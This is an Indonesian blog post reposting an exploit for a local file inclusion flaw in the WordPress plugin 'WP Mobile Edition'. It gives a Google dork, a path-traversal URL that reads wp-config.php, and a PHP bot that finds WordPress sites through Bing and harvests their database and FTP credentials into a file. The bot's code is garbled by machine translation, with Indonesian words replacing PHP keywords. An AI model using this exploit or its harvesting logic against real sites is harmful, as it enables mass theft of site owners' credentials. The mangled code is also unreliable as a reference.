Plugin WordPress 'WP Mobile Edition' LFI Vulnerability

Oleh chmood

Sabtu, Oktober 10, 2015

#######################################
# Exploit Judul: WordPress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Tanggal: 6 Juni 2015 #
# Exploit Penulis: Virus OS #
# Google Dork: iilnurl:? Fdx_switcher = Mobe #
# Penjual Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Versi: WP Mobile Edition Versi 2.2.7 #
# Diuji pada: jendela #
########################################
Keterangan:
Wordpress Plugin 'WP Mobile Edition' tidak menyaring data sehingga kita bisa mendapatkan file configration di jalan
<Site.com/wp-content/themes/mTheme-Unus/css/css.php?files = .. / .. / .. / .. / wp-config.php>

# Exploite Kode:
<? php
// Virus OS
set_time_limit (0);
error_reporting (0);
echo "############### Fdx_Switcher Minibot Dengan ip Rentang ################## \ n \ n";
print "Kode By _
__ _ (_) _ __ _ _ ___ ___ ___
\ \ / / | '__ | | | / __ | / _ \ / __ |
\ V / | | | | | _ | \ __ \ | (_) \ __ \
\ _ / | _ | _ | \ __, _ | ___ / \ ___ / | ___ /
Menyapa >> CoderLeeT | Fallag Gassrini | Taz | S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook: https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook: https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Selamat Guru Virus OS ################ \ n \ n";
echo "Server Sasaran IP:";
$ ip = trim (fgets (STDIN, 1024));
$ ip = meledak (, $ ip '.');
. '.'.. '.'. $ ip = $ ip [0] $ ip [1] $ ip [2]. '.';
untuk ($ i = 0; $ i <= 255; $ i ++)
{
$ situs = array_map ("situs", bing ("ip: $ ip $ i wordpress."));
$ un = array_unique ($ situs);
echo "[+] Scanning ->", $ ip $ i, "\ n";. "."
echo "Ditemukan:" Count ($ situs) "situs \ n \ n";.
foreach ($ un sebagai $ pok) {
$ host = findit ($ file, "DB_HOST ','", "');");
$ db = findit ($ file, "DB_NAME ','", "');");
$ kita = findit ($ file, "DB_USER ','", "');");
$ pw = findit ($ file, "DB_PASSWORD ','", "');");
$ bda = "http: // $ pok";
$ linkof = '/ wp-content / themes / mTheme-Unus / css / css.php file = .. / .. / .. / .. / wp-config.php?';
$ dn = ($ bda) ($ linkof).;
$ file = @ file_get_contents ($ dn);
if (eregi ('DB_HOST', $ file) dan! eregi ('FTP_USER', $ file)) {
.. echo "[+] Scanning =>" $ bda "\ n \ n";
echo "[+] DB NAME:" .findit ($ file, "DB_NAME ','", "');") "\ n \ n";.
echo "[+] DB USER:" .findit ($ file, "DB_USER ','", "');") "\ n \ n";.
echo "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
echo "[+] DB host:" .findit ($ file, "DB_HOST ','", "');") "\ n \ n";.
$ db = "[+] DB NAME:". .findit ($ file, "DB_NAME ','", "');") "\ n \ n";
$ user = "[+] DB PENGGUNA:". .findit ($ file, "DB_USER ','", "');") "\ n \ n";
$ pass = "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
$ host = "[+] DB host:". .findit ($ file, "DB_HOST ','", "');") "\ n \ n";
$ ux = "" $ bda.. "\ r \ n";
$ ux1 = "". $ db. "\ r \ n";
$ UX2 = "" $ user.. "\ r \ n";
$ ux3 = "". $ lulus. "\ r \ n";
$ ux4 = "" $ host.. "\ r \ n";
$ menyelamatkan = fopen ('exploited.txt', 'ab');
fwrite ($ simpan, "$ ux");
fwrite ($ simpan, "$ ux1");
fwrite ($ simpan, "$ UX2");
fwrite ($ simpan, "$ ux3");
fwrite ($ simpan, "$ ux4");
}
elseif (eregi ('DB_HOST', $ file) dan eregi ('FTP_USER', $ file)) {
echo "user FTP:" .findit ($ file, "FTP_USER ','", "');") "\ n \ n";.
echo "FTP lulus:" .findit ($ file, "FTP_PASS ','", "');") "\ n \ n";.
echo "FTP host:" .findit ($ file, "FTP_HOST ','", "');") "\ n \ n";.
}
else {echo $ bda ": Eksploitasi gagal \ n \ n";.}
}
}
Fungsi findit ($ mytext, $ StartTag, $ EndTag) {
$ posLeft = stripos ($ mytext, $ StartTag) + strlen ($ StartTag);
$ posRight = stripos ($ mytext, $ EndTag, $ posLeft + 1);
pulang substr ($ mytext, $ posLeft, $ posRight- $ posLeft);
}
situs function ($ link) {
kembali str_replace ("", "", parse_url ($ link PHP_URL_HOST));
}
Fungsi bing ($ apa) {
untuk ($ i = 1; $ i <= 2000; $ i + = 10) {
$ ch = curl_init ();
curl_setopt ($ ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ ch, CURLOPT_USERAGENT, "msnbot / 1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ ch, CURLOPT_COOKIEFILE, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_COOKIEJAR, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1);
$ data = curl_exec ($ ch);
preg_match_all ('#;? a = (*) "h =" #.', $ data, $ link);
foreach ($ link [1] sebagai $ link) {
$ allLinks [] = $ Link;
}
jika istirahat (preg_match ('# "sw_next" #', $ data)!);
}

if (! empty ($ allLinks) && is_array ($ allLinks)) {
kembali array_unique (array_map ("urldecode", $ allLinks));
}
}

Category

Dork Exploitations

Komentar

Postingan Lebih Baru Postingan Lama

Plugin WordPress 'WP Mobile Edition' LFI Vulnerability

Backlink dengan Google Dork Seo

Cara Dapat Backlink dengan Google Dork

Cara Dapat Backlink Edu Gratis

Cara Login Beberapa Akun Dalam 1 Browser [Work Semua Web Login]

Bagi-bagi Dork

Hacking Facebook Using Fake Login

Download File ISO Windows 11 Dan Bootable USB Rufus

5 Software Proxy Terbaik Untuk Anonymous Browsing

Optimasi Meta Tag di New Blogger